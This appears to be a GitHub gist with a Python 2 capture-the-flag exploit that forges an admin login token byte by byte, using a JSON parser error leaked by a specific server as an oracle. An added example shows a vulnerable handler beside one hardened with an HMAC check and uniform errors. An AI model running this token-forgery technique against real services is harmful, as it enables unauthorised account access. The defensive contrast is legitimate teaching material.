@quandqn
Last active November 9, 2016 06:14
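# Python 2 script (uses str.encode("hex") and the print statement).
import requests

url = "http://128.199.226.92:31333/login/"
wanted = '{"user":"admin"}'
payload = ""
# Substring of the JSON parser error that the server returns in its response.
sig = "Expecting property name"

# Build 15 token bytes, one position at a time, that each decrypt to a space.
for i in range(15):
    for j in range(0x100):  # all 256 byte values
        # payload so far + candidate byte, padded with "a" to 32 hex characters
        r = requests.get(url + payload.encode("hex") + "%02x" % j + (30-2*len(payload)) * "a")
        if sig in r.text:
            # j is taken as the byte that decrypts to "{"; the XOR maps it to
            # the byte that decrypts to a space (0x20), which JSON skips.
            payload += chr(j ^ ord("{") ^ 0x20)
            break

# Re-key the 15 bytes so they decrypt to the first 15 characters of `wanted`.
payload = "".join([chr(ord(x) ^ ord(y) ^ 0x20) for x, y in zip(payload, wanted)])

# Try every value for the 16th byte until the response contains the flag marker.
for i in range(0x100):
    r = requests.get(url + payload.encode("hex") + "%02x" % i)
    if "SVATTT" in r.text:
        print r.text
        break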
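
The script depends on two server behaviours: ciphertext that can be modified byte by byte without being rejected, and a response that includes the JSON parser's error text. The following is an added example, not part of the gist, contrasting a handler with those two properties against one that verifies an HMAC before decrypting and answers every failure identically. The gist does not show the server, so the handler names, the keys and the toy keystream are all assumptions.

```python
import hashlib
import hmac
import json

# Constructed demo keys; a real service would load these from a secret store.
ENC_KEY = b"demo-enc-key"
MAC_KEY = b"demo-mac-key"

def keystream(n):
    # Toy fixed keystream (assumption) so the demo runs with the standard
    # library only. Production code should use an AEAD with a fresh nonce.
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(ENC_KEY + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]

def xor_stream(data):
    return bytes(a ^ b for a, b in zip(data, keystream(len(data))))

def login_vulnerable(token_hex):
    """Decrypts unauthenticated input and echoes the parser error."""
    try:
        doc = json.loads(xor_stream(bytes.fromhex(token_hex)).decode("latin-1"))
        return "hello " + doc["user"]
    except Exception as exc:
        return "error: %s" % exc  # tells the client how far parsing got

def issue_token(user):
    ct = xor_stream(json.dumps({"user": user}).encode())
    return (ct + hmac.new(MAC_KEY, ct, hashlib.sha256).digest()).hex()

def login_hardened(token_hex):
    """Verifies the MAC before decrypting; every failure looks the same."""
    try:
        raw = bytes.fromhex(token_hex)
        ct, tag = raw[:-32], raw[-32:]
        expected = hmac.new(MAC_KEY, ct, hashlib.sha256).digest()
        if len(raw) <= 32 or not hmac.compare_digest(tag, expected):
            return "invalid token"
        return "hello " + json.loads(xor_stream(ct))["user"]
    except Exception:
        return "invalid token"

if __name__ == "__main__":
    leaky = xor_stream(b"{ garbage").hex()  # constructed malformed token
    print(login_vulnerable(leaky))          # parser detail reaches the client
    print(login_hardened(leaky))            # uniform rejection
    print(login_hardened(issue_token("guest")))
```

With the MAC checked first, a modified token never reaches the decryption or parsing step, so there is no per-byte signal left in the response.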